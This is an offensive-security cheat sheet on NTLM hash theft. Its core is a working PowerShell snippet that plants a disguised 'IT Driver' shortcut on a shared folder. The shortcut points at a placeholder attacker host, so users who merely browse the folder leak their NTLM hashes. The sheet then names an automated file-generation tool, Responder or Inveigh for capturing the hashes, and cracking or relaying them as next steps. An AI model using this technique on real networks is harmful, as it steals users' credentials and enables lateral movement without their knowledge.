NTLM Hash Theft
Theft Files
Any writable directory (shares, nfs, locally) where users will list contents you can use certain file types to steal hashes
Manual: (.lnk)
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("\\DC01.domain.local\OpenShare\IT-Driver.lnk")
$lnk.TargetPath = "\\<AttackerIP>\@ico.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "IT Driver"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Automated (multi-type):
https://github.com/Greenwolf/ntlm_theft
Generate all file types:
Monitor for traffic with Responder on linux or Inveigh on windows. Hash received? Try to crack it
OR: Relay Attacks